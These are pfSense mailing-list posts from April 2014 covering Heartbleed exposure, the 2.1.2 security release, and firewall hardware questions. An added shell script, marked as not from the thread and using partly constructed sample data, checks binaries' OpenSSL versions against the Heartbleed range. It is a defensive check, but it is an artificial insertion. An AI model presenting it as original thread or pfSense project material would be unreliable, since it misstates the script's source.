http://www.minnowboard.org/meet-minnowboard-max/

> I don't see that a breakout cable exists yet for the high-speed expansion bus, so there's that minor (*cough*) problem... but that seems a much smaller problem than re-tooling the board.
>
>> We would need a simple enclosure as well. Painted (or powder-coated) steel is less expensive than anodized aluminum, but I think the anodized aluminum looks
>
> In case you don't have a local firm you're happy with, talk to Protocase for sample qtys. I've seen them be cheaper than mass mfg for small runs of simple cases (e.g. interlocked-U style).

We have a local firm we’re pretty happy with. We also have a lot of experience in injection molding now (smallworks.com)

>> The other issue is single or dual core and 1GB or 2GB ram (4GB?)?
>
> The stock 2GB version should be adequate (barely) IMHO for most applications that function with that class of CPU/ethernet/storage anyway. Much more interesting to me would be if a small, low-cost board like that were available with ECC. That CPU does support ECC RAM, after all…

yes it does. ECC ram is also a lot more expensive.

>> How interesting is the m-sata / miniPCIe option?
>
> Not to me, as I tend to deploy pfSense at the higher-end of the spectrum, but *some* way to add WiFi would probably be important for the putative target audience. USB probably won't cut it for an AP, so mPCIe is probably needed. Again, expansion-header-to-mPCIe should be possible instead of reworking the board... and unlike PCIe 1x sockets, that wouldn't take up much more room than putting the mPCIe headers on the board.

see above.

>> How you can help: Indicate your level of interest.
>
> Neat, but not commercially interesting to me right now. Linksys/ASUS/D-Link make cheaper gateways that are good enough for home users, and commercial users will either get a FortiWiFi (or equivalent) or if pfSense, re-use an existing rackmount server.
>
>> This board would without a doubt cost more than the minnow board. I don’t know how much more, but we’re not going to hit the same volumes as the minnow board. (I could be wrong.) The minnow board could be subsidized by Intel. (I could be wrong.)
>
> See above comments :-). I'm not sure if a breakout cable is 100% workable, but if so it's a faster/cheaper option than mPCIe.
>
>> It’s going to require a significant investment (up-front NRE), an investment in getting a run of these made, and some return on those investments (profit). How important is form-factor? Larger PCBs cost more, but can sometimes relax routing enough to not need additional layers (fewer layers tend to cost less).
>
> Smaller is better. Otherwise I may as well just deploy a miniITX or 1U system. Which, yes, argues *against* using a breakout cable for PCIe.
>
>> - dual core or single core? Remember that pfSense 2.2 (which is based on FreeBSD 10) supports a pf capable of multi-threading.
>
> Good question - optimize for today or for tomorrow?

Back when I was a teenager, I liked to hang out in the local speed shop. There was a plaque on the wall, with a very bent connecting rod, and the following lettered below it: “Speed costs money, son. How fast do you want to go?”

This was before Mad Max appropriated it: http://www.imdb.com/title/tt0079501/quotes?item=qt0427399

Jim
Re: [pfSense] The Heartbleed Bug, CVE-2014-0160
Well, that’s the point, Paul. (You hit the nail on the head.) If you don’t have an openssl service exposed, the problem doesn’t affect you. Since normally the web GUI isn’t exposed to the WAN, the attack surface is minimized.

We are working at cutting a new release.

Jim

On Apr 8, 2014, at 1:49 PM, Paul Galati paulgal...@gmail.com wrote:

> Is this vulnerability tied to a secure web connection on the wan interface? If I do not have the web gui enabled on the wan interface and I am not using openVPN, what other services allow this point of entry possible? Thanks for your time.
>
> Paul Galati
> paulgal...@gmail.com
>
> On Apr 8, 2014, at 8:20 AM, Marek Salwerowicz marek_...@wp.pl wrote:
>
>> Regarding the web test provided at: http://filippo.io/Heartbleed/
>>
>> All my pfSense firewalls (their HTTPS WEB GUI) are vulnerable...
Re: [pfSense] The Heartbleed Bug, CVE-2014-0160
On Apr 8, 2014, at 12:34 PM, Paul Heinlein heinl...@madboa.com wrote:

> On Tue, 8 Apr 2014, b...@todoo.biz wrote:
>
>> This might not be enough as there are two versions of openssl installed… One in /usr/bin/openssl and one in /usr/local/bin/openssl
>> Both should be ok.
>
> Not on 2.1:
>
> [2.1-RELEASE]/root(9): /usr/local/bin/openssl version
> OpenSSL 1.0.1e 11 Feb 2013
>
> Worse, that's the version used by OpenVPN and lighttpd:

Your use of “worse” here merely pours gasoline on an already burning fire.

> [2.1-RELEASE]/root(8): ldd /usr/local/sbin/openvpn
> /usr/local/sbin/openvpn:
>         libssl.so.8 => /usr/local/lib/libssl.so.8 (0x8007e9000)
>         libcrypto.so.8 => /usr/local/lib/libcrypto.so.8 (0x80094f000)
>
> [2.1-RELEASE]/root(14): ldd /usr/local/sbin/lighttpd
> /usr/local/sbin/lighttpd:
>         libssl.so.8 => /usr/local/lib/libssl.so.8 (0x8007d3000)
>         libcrypto.so.8 => /usr/local/lib/libcrypto.so.8 (0x800939000)

The situation is no different with pfSense version 2.1.1, even though the ports version of openssl is 1.0.1f. (1.0.1g is required to be clear of the Heartbleed issue.)

[2.1.1-RELEASE][root@pfSense.localdomain]/root(3): /usr/local/bin/openssl version
OpenSSL 1.0.1f 6 Jan 2014
[2.1.1-RELEASE][root@pfSense.localdomain]/root(4): /usr/bin/openssl version
OpenSSL 0.9.8y 5 Feb 2013
[2.1.1-RELEASE][root@pfSense.localdomain]/root(5):
[2.1.1-RELEASE][root@pfSense.localdomain]/root(15): ldd /usr/local/sbin/openvpn
/usr/local/sbin/openvpn:
        liblzo2.so.2 => /usr/local/lib/liblzo2.so.2 (0x8006ca000)
        libssl.so.8 => /usr/local/lib/libssl.so.8 (0x8007e9000)
        libcrypto.so.8 => /usr/local/lib/libcrypto.so.8 (0x80094f000)
        libc.so.7 => /lib/libc.so.7 (0x800c22000)
        libthr.so.3 => /lib/libthr.so.3 (0x800e4f000)
[2.1.1-RELEASE][root@pfSense.localdomain]/root(22): ldd /usr/local/sbin/lighttpd
/usr/local/sbin/lighttpd:
        libpcre.so.3 => /usr/local/lib/libpcre.so.3 (0x80067)
        libssl.so.8 => /usr/local/lib/libssl.so.8 (0x8007d3000)
        libcrypto.so.8 => /usr/local/lib/libcrypto.so.8 (0x800939000)
        libthr.so.3 => /lib/libthr.so.3 (0x800c0c000)
        libc.so.7 => /lib/libc.so.7 (0x800d25000)

As previously mentioned, we’re working on a new release.

jim
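An added check script (not from this thread or the pfSense project) that encodes the point made above: for each TLS-using binary, find which libssl it actually loads (ports copy under /usr/local vs. the FreeBSD base copy) and classify that build's version banner against the Heartbleed-affected range, 1.0.1 through 1.0.1f. The openvpn ldd output and the two version banners are taken from the 2.1.1 transcript above; the sshd sample is a constructed base-linked case, and audit_live is an assumed helper for running the same check on a real box.

```shell
#!/bin/sh
# Added example: map each TLS-using daemon to the OpenSSL build it links
# (ports copy under /usr/local vs. the FreeBSD base copy) and classify that
# build's version banner against the Heartbleed-affected range.
# CVE-2014-0160 affects OpenSSL 1.0.1 through 1.0.1f; 1.0.1g is fixed, and the
# 0.9.8 / 1.0.0 branches have no TLS heartbeat extension, so they are not affected.

# heartbleed_status "OpenSSL 1.0.1f 6 Jan 2014"
# Prints VULNERABLE or NOT_AFFECTED; returns 2 if the banner is not an
# "OpenSSL <version>" line at all, so an unparseable banner is never mistaken
# for a clean one.
heartbleed_status() {
    ver=$(printf '%s\n' "$1" | sed -n 's/^OpenSSL \([0-9][0-9.]*[a-z]*\).*/\1/p')
    [ -n "$ver" ] || return 2
    case "$ver" in
        1.0.1|1.0.1[a-f]) echo VULNERABLE ;;
        *) echo NOT_AFFECTED ;;
    esac
}

# libssl_path "<ldd output>"
# Prints the resolved libssl path from ldd output; returns 1 if the binary
# does not link libssl at all.
libssl_path() {
    p=$(printf '%s\n' "$1" | sed -n 's/.*libssl\.so[^ ]* => \([^ ]*\).*/\1/p' | head -n 1)
    [ -n "$p" ] || return 1
    echo "$p"
}

# openssl_build_of "/usr/local/lib/libssl.so.8" -> ports; anything else -> base
openssl_build_of() {
    case "$1" in
        /usr/local/*) echo ports ;;
        *) echo base ;;
    esac
}

# audit_binary NAME LDD_OUTPUT PORTS_BANNER BASE_BANNER
# Prints "NAME LIBSSL BUILD STATUS", using the banner of the OpenSSL build
# that the binary actually loads rather than whichever openssl is first in PATH.
audit_binary() {
    name=$1; ldd_out=$2; ports_banner=$3; base_banner=$4
    lib=$(libssl_path "$ldd_out") || { echo "$name - none NOT_LINKED"; return 0; }
    build=$(openssl_build_of "$lib")
    if [ "$build" = ports ]; then
        status=$(heartbleed_status "$ports_banner") || status=UNKNOWN
    else
        status=$(heartbleed_status "$base_banner") || status=UNKNOWN
    fi
    echo "$name $lib $build $status"
}

# Assumed live helper for a FreeBSD/pfSense shell: runs ldd on a real binary
# and asks the ports and base openssl binaries for their banners. Not called below.
audit_live() {
    ldd_out=$(ldd "$1" 2>/dev/null) || { echo "$1: ldd failed"; return 1; }
    audit_binary "$1" "$ldd_out" \
        "$(/usr/local/bin/openssl version 2>/dev/null)" \
        "$(/usr/bin/openssl version 2>/dev/null)"
}

# --- Sample input taken from the 2.1.1 transcript in the thread ---
PORTS_BANNER='OpenSSL 1.0.1f 6 Jan 2014'
BASE_BANNER='OpenSSL 0.9.8y 5 Feb 2013'
OPENVPN_LDD='/usr/local/sbin/openvpn:
	liblzo2.so.2 => /usr/local/lib/liblzo2.so.2 (0x8006ca000)
	libssl.so.8 => /usr/local/lib/libssl.so.8 (0x8007e9000)
	libcrypto.so.8 => /usr/local/lib/libcrypto.so.8 (0x80094f000)
	libc.so.7 => /lib/libc.so.7 (0x800c22000)'
# Constructed base-linked case (not from the thread): a binary on the base libssl.
SSHD_LDD='/usr/sbin/sshd:
	libssl.so.6 => /usr/lib/libssl.so.6 (0x800a00000)
	libcrypto.so.6 => /lib/libcrypto.so.6 (0x800c00000)'

audit_binary openvpn "$OPENVPN_LDD" "$PORTS_BANNER" "$BASE_BANNER"
audit_binary sshd    "$SSHD_LDD"    "$PORTS_BANNER" "$BASE_BANNER"
```

Run against real binaries with audit_live /usr/local/sbin/openvpn and friends; a 1.0.1a-f result for a ports-linked daemon is exactly the 2.1/2.1.1 situation the thread describes.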
Re: [pfSense] The Heartbleed Bug, CVE-2014-0160
On Apr 8, 2014, at 3:39 PM, Rainer Duffner rai...@ultra-secure.de wrote:

> On 08.04.2014 at 21:04, Jim Thompson j...@smallworks.com wrote:
>
>> Well, that’s the point, Paul. (You hit the nail on the head.) If you don’t have an openssl service exposed, the problem doesn’t affect you. Since normally the web GUI isn’t exposed to the WAN, the attack surface is minimized.
>>
>> We are working at cutting a new release.
>
> Hi,
>
> according to: http://www.kb.cert.org/vuls/id/BLUU-9HY33E only FreeBSD 10 is affected. There are binary updates for FreeBSD 10 available, just no advisory-text.
>
> No update for FreeBSD 9.1

pfSense 2.1 and 2.1.1 are affected.

Jim
Re: [pfSense] The Heartbleed Bug, CVE-2014-0160
> I believe pfSense users are only affected by the secondary flaw, and also any software in pfSense using the /usr/local/... version of OpenSSL, as mentioned by Vick Khera earlier.

Both SAs affect pfSense 2.1 and 2.1.1.

Heartbleed is an issue because OpenSSL version 1.0.1f is used for software that is not part of FreeBSD 8.3-RELEASE (i.e. things found in /usr/local) in addition to the version without the Heartbleed issue, which is part of FreeBSD 8.3-RELEASE.

Both issues are being corrected via pending release of pfSense 2.1.2, as well as a near future rev for the pfSense 2.2 snapshots.

-- Jim

On Apr 8, 2014, at 21:05, Paul Mather p...@gromit.dlib.vt.edu wrote:

> On Apr 8, 2014, at 9:35 PM, Paul Mather p...@gromit.dlib.vt.edu wrote:
>
>> On Apr 8, 2014, at 3:04 PM, Jim Thompson j...@smallworks.com wrote:
>>
>>> Well, that’s the point, Paul. (You hit the nail on the head.) If you don’t have an openssl service exposed, the problem doesn’t affect you. Since normally the web GUI isn’t exposed to the WAN, the attack surface is minimised.
>>
>> The FreeBSD Security Advisory FreeBSD-SA-14:06.openssl states this in the Impact section:
>>
>> =====
>> III. Impact
>>
>> An attacker who can send a specifically crafted packet to TLS server or client with an established connection can reveal up to 64k of memory of the remote system. Such memory might contain sensitive information, including key material, protected content, etc. which could be directly useful, or might be leveraged to obtain elevated privileges. [CVE-2014-0160]
>>
>> A local attacker might be able to snoop a signing process and might recover the signing key from it. [CVE-2014-0076]
>> =====
>>
>> I take that to read the vulnerability being exploitable both ways, i.e., a malicious server could also attack a vulnerable client connecting to it via SSL/TLS, making the attack surface potentially much larger.
>>
>> FWIW, the pre-advisory heads-up message from the FreeBSD Security Officer appears to back this up. It included the following advice:
>>
>> =====
>> Users who use TLS client and/or server are strongly advised to apply updates immediately. Because of the nature of this issue, it's also recommended for system administrators to consider revoking all of server certificate, client certificate and keys that is used with these systems and invalidate active authentication credentials with a forced passphrase change.
>> =====
>
> Just as a followup and clarification to the above, the recent OpenSSL vulnerability Security Advisory actually covers two OpenSSL flaws. The heartbleed flaw only affects FreeBSD 10 in the base OS. All other supported FreeBSD releases are affected by the other flaw they describe (in the ECDSA Montgomery Ladder Approach implementation).
>
> I believe pfSense users are only affected by the secondary flaw, and also any software in pfSense using the /usr/local/... version of OpenSSL, as mentioned by Vick Khera earlier.
>
> Kudos to the pfSense team for beavering away and cranking out a fix!
>
> Cheers,
>
> Paul.
Re: [pfSense] The Heartbleed Bug, CVE-2014-0160
2.1.2 wasn’t “UP”. Chris cut a version of something he called “2.1.2” that he indicated *might* become 2.1.2, but it was incomplete. So I asked him to pull it back down.

Jim

On Apr 9, 2014, at 4:59 PM, Ryan Coleman ryanjc...@me.com wrote:

> There was a post to the list at 0400 central US today that 2.1.2 was up but then he pulled it. I haven’t heard anything since then.
>
> You could turn off SSL or just not use it for the time being from anywhere you don’t trust the system - if they don’t see traffic to the firewall they cannot snoop your information.
>
> On Apr 9, 2014, at 3:40 PM, mayak ma...@australsat.com wrote:
>
>> snip
>>
>> hi all,
>>
>> any news? my routers feel exposed :-)
>>
>> god bless pfsense.
>>
>> m
Re: [pfSense] 2.1.2-RELEASE up for testing
The final testing (testing updates against the real update servers, which can’t be effectively simulated) is happening now.

jim

On Apr 10, 2014, at 12:50 PM, k_o_l k_...@hotmail.com wrote:

> Any update to when the fix will be released?!
>
> -----Original Message-----
> From: List [mailto:list-boun...@lists.pfsense.org] On Behalf Of Chris Buechler
> Sent: Wednesday, April 09, 2014 5:04 AM
> To: pfSense support and discussion
> Subject: Re: [pfSense] 2.1.2-RELEASE up for testing
>
> Scratch that - that just missed a commit for another security fix, it's rebuilding now.
>
> On Wed, Apr 9, 2014 at 3:48 AM, Chris Buechler c...@pfsense.org wrote:
>
>> Normally we wouldn't put these out to the general public at this stage, but a few people are wanting the OpenSSL fix ASAP, and I already posted it to the forum. I've upgraded a handful of production systems and it seems fine, but still a number of things we'll verify before announcing it more widely and sending it to the mirrors and auto-update. I think this is what will become 2.1.2 release.
>>
>> https://files.pfsense.org/cmb/2.1.2-REL-testing/
>>
>> also mirrored at:
>> http://files.nyi.pfsense.org/cmb/2.1.2-REL-testing/
>>
>> Those are signed and everything, just a matter of moving them into place if things test out fine.
[pfSense] pfSense 2.1.2 is released
https://blog.pfsense.org/?p=1253

pfSense release 2.1.2 is now available.

pfSense release 2.1.2 follows less than a week after pfSense release 2.1.1, and is primarily a security release. The Heartbleed OpenSSL bug and another OpenSSL bug which enables a side-channel attack are both covered by the following security announcements:

• pfSense-SA-14_04.openssl
• FreeBSD-SA-14:06.openssl
• CVE-2014-0160 (Heartbleed)
• CVE-2014-0076 (ECDSA Flaw)

Packages also have their own independent fixes and need updating. During the firmware update process the packages will be properly reinstalled. If this fails for any reason, uninstall and then reinstall packages to ensure that the latest version of the binaries is in use.

Other Fixes

• On packages that use row_helper, when user clicks on an add or delete button, the page scrolls to top. #3569
• Correct a typo on function name in Captive Portal bandwidth allocation.
• Make extra sure that we do not start multiple instances of dhcpleases if, for example, the PID is stale or invalid, and there is still a running instance.
• Fix for CRL editing. Use an alphanumeric test rather than purely is_numericint because the ID is generated by uniqid and is not purely numeric. #3591

You will want to perform a full security audit of your pfSense installations, renewing any passwords, generating or fitting new certificates, placing the old certificates on a CRL, etc.
Re: [pfSense] pfSense 2.1.2 is released
On Apr 10, 2014, at 4:10 PM, Volker Kuhlmann hid...@paradise.net.nz wrote:

> On Fri 11 Apr 2014 07:23:52 NZST +1200, Jim Thompson wrote:
>
>> pfSense release 2.1.2 is now available.
>
> Thank you for all the quick work!
>
> May I ask though why this isn't simultaneously posted on pfsense-announce and pfsense-security-announce? In particular, if the security-announce list was to be used as a reliable source of critical information, posting the 2.1.2 release announcement with the heartbleed fix is not optional???

It was posted on announce@, but it seems that I’m moderated there. This is why my 2.1.1 release announcement was also held. I’ve pushed the message through.

security@ is for posting SAs.

Jim
Re: [pfSense] pfSense 2.1.2 is released
On Apr 10, 2014, at 4:25 PM, Dimitri Rodis dimit...@integritasystems.com wrote:

> Can we also get information as to which versions of pfSense are affected aside from 2.1.1? Or is 2.1.1 the only affected version?

https://pfsense.org/security/advisories/pfSense-SA-14_04.openssl.asc
Re: [pfSense] pfSense 2.1.2 is released
They're built; we're waiting on Amazon.

-- Jim

On Apr 11, 2014, at 22:41, linbloke linbl...@fastmail.fm wrote:

> On 11/04/2014 5:23 am, Jim Thompson wrote:
>
>> https://blog.pfsense.org/?p=1253
>>
>> pfSense release 2.1.2 is now available.
>>
>> pfSense release 2.1.2 follows less than a week after pfSense release 2.1.1, and is primarily a security release.
>
> Thanks for the new release. Any sign of updated AWS AMIs?
>
> Regards,
> lb
>
>> The Heartbleed OpenSSL bug and another OpenSSL bug which enables a side-channel attack are both covered by the following security announcements:
>>
>> • pfSense-SA-14_04.openssl
>> • FreeBSD-SA-14:06.openssl
>> • CVE-2014-0160 (Heartbleed)
>> • CVE-2014-0076 (ECDSA Flaw)
>>
>> Packages also have their own independent fixes and need updating. During the firmware update process the packages will be properly reinstalled. If this fails for any reason, uninstall and then reinstall packages to ensure that the latest version of the binaries is in use.
>>
>> Other Fixes
>>
>> • On packages that use row_helper, when user clicks on an add or delete button, the page scrolls to top. #3569
>> • Correct a typo on function name in Captive Portal bandwidth allocation.
>> • Make extra sure that we do not start multiple instances of dhcpleases if, for example, the PID is stale or invalid, and there is still a running instance.
>> • Fix for CRL editing. Use an alphanumeric test rather than purely is_numericint because the ID is generated by uniqid and is not purely numeric. #3591
>>
>> You will want to perform a full security audit of your pfSense installations, renewing any passwords, generating or fitting new certificates, placing the old certificates on a CRL, etc.
Re: [pfSense] pfSense 2.1.2 is released
On Apr 12, 2014, at 18:55, Volker Kuhlmann hid...@paradise.net.nz wrote:

> On Fri 11 Apr 2014 18:43:18 NZST +1200, Ryan Coleman wrote:
>
>> He gave you an option to subscribe to the list.
>
> You seem to have missed the point I was making: critical security fixes (the 2.1.2 release in this case, unless I am misunderstanding) were not posted to security-announce@. The posting to announce@ only happened, because of initial setup problems, after I pointed out it was missing.
>
> Volker

Technically, the SA was posted, but the guy (Jeremy) who setup the list hasn't given me mod privs yet, and they are stuck in the mod queue.

So, actually, I've not missed your point. The whole security-announce setup is quite new. Patience, please, while the kinks are worked out.

Jim
Re: [pfSense] pfSense 2.1.2 is released
> On Apr 16, 2014, at 4:34 PM, Brian Candler b.cand...@pobox.com wrote:
>
> On 15/04/2014 20:12, Jim Thompson wrote:
>> We dropped the price, too.
>>
>> -- Jim
>
> Which price are you referring to?

On the EC2 instance(s).

> I see that a support subscription is now $200 for 2 hours plus $200 per extra hour.

$400 for the initial 2 hours, $200/hr after that.

> The one my client purchased a couple of months ago was $600 for 5 hours and (I think) $100 per extra hour. That doesn't sound like a price drop to me :-)

The initial buy-in is $400, not $600.
Re: [pfSense] Interface options for pfsense
> On Apr 22, 2014, at 10:39, Stefan Baur newsgroups.ma...@stefanbaur.de wrote:
>
> In fact, I'd be pretty disappointed, too, if a newer pfSense release stopped working on my hardware and the whole issue appeared out of the blue (== no "hme driver no longer supported" or similar notice in the release notes).

Your potential disappointment is noted.

It's not like we disabled the hme driver. We have no ability to test it, since we don't have one of these cards. Nor are we likely to invest in one.

I can think of a half dozen reasons that could cause the card to run on 2.0.3, and not run on 2.1.

Jim
Re: [pfSense] Interface options for pfsense
> On Apr 20, 2014, at 5:32 PM, Volker Kuhlmann list0...@paradise.net.nz wrote:
>
> I've been running pfsense for many years (and been very happy with it) on scrapped PCs with a Sun 4-port Ethernet PCI card because I need 5 Ethernet ports. Now freebsd dying on the hme driver effectively turns those cards into scrap and I'm stuck. What are alternatives now? Are there any other 4-port cards that are supported by pfsense in practice (not just in theory), that are also affordable?

You’ll need to define “affordable”. You’ll also need to state if you’re looking for PCI, PCI-X or PCIe cards.

> The power consumption (and box volume) of scrapped PCs is not optimal, and I've been looking at moving to a small single-board. Soekris was always underpowered and overpriced IMHO, and PCEngines underpowered, until they released the exciting APU series recently. They all only have 3 Ethernet ports though, which is the stopper here. What mPCIe Ethernet cards are supported by pfsense that people can recommend?

We’ve run some experiments with various Intel-based cards in a NUC (we’re building a rack mount for them). They work, but it’s not an inexpensive solution.

> Are there any USB Ethernet adapters that actually work with pfsense? Reliably? I am looking for reports from those who have tried, not the freebsd supported HW list - that list is too long and not really trustworthy (I have a USB wifi adapter which runs for 10min then makes pfsense kernel panic).

WiFi isn’t recommended until at least pfSense 2.2, if then.

> The frequently recommended option of using VLANs may look good for larger commercial networks, but just buying a VLAN capable switch costs more than a suitable pfsense box and brings the power budget of the combination to the same level as a scrapped PC - with the latter winning hands down on cost.

You can pick up the 8 port HP switches (e.g. 1810-8G aka J9802A) for less than $100 these days. No fan, so noise-free. 8W maximum. Real SNMP implementation, supports 802.1q, jumbo packets, etc.

When we lived in Hawaii (expensive power), I used to run a 24-port version of this (1810-24G aka J9803A). Still no fan, 24 10/100/1000 ports, of these can support SFP. Current price is less than $200 on newegg, and probably way more switch than you need.

These days my “home lab” (the test lab at work) has a dedicated room, dedicated AC, several racks, and is connected via redundant 10Gbps links, with a backup fiber link at 100Mbps, so my home network is just an APU, a 16-port dumb switch, and a couple 802.11 APs. If I decided to upgrade the Grande connection to 1Gbps or, when Google fiber arrives, I’ll probably replace all that with an SDN (OpenFlow) setup.

Jim
Re: [pfSense] Interface options for pfsense
> On Apr 22, 2014, at 12:27 PM, Stefan Baur newsgroups.ma...@stefanbaur.de wrote:
>
> On 22.04.2014 18:29, Jim Thompson wrote:
>> It's not like we disabled the hme driver.
>
> Nobody accused you of intentionally disabling it. Manure happens. :-) Relax.
>
>> We have no ability to test it, since we don't have one of these cards. Nor are we likely to invest in one.
>
> Over in the Interface yoyo thread, Message-ID 5355875d.9050...@athompso.net, Adam Thompson wrote:
>> If any of the devs want to test this hardware, I have at least one just sitting on the shelf I can ship to you. (I thought I had 3 or 4 of them, maybe they're still sitting in the E450s that are also sitting on the shelf. Well, actually on the ground, but only because I don't have any shelves that can hold *those*.)
>
> If Adam is willing to donate his spare card to you dev folks, and maybe Volker buys a Gold Membership (in case he doesn't have one already), would that significantly increase the chances of having a working hme driver in a future release? :-)

That would require finding a PC with a PCI slot, and time.
Re: [pfSense] Interface options for pfsense
> On Apr 22, 2014, at 3:42 PM, Volker Kuhlmann hid...@paradise.net.nz wrote:
>
> On Wed 23 Apr 2014 05:02:59 NZST +1200, Jim Thompson wrote:
>>> Are there any USB Ethernet adapters that actually work with pfsense? Reliably? I am looking for reports from those who have tried, not the freebsd supported HW list - that list is too long and not really trustworthy (I have a USB wifi adapter which runs for 10min then makes pfsense kernel panic).
>>
>> WiFi isn't recommended until at least pfSense 2.2, if then.
>
> OK, thanks Jim, good to know. Do you mean this to apply to USB wifi only?

No.

> There are cheap mPCIe atheros-based wifi cards for the PCEngine APU board. Are they known to be reliable?

Yes, I know. We sell thousands of them every month, but not for use in pfSense. Maybe with 2.2 the situation will improve.

>> You can pick up the 8 port HP switches (e.g. 1810-8G aka J9802A) for less than $100 these days. No fan, so noise-free. 8W maximum.
>
> Yes, thank you for mentioning that - I had seen that yesterday and their power specs had escaped me when I looked at them previously (some of those similar models do guzzle it). That's my plan B, but I really don't like to use VLANs when I can avoid the clutter and complexity (more bugs, more time spent). A pfsense box with more ports is much easier.

You asked.

BTW, VLANs end up as less clutter, not more.

jim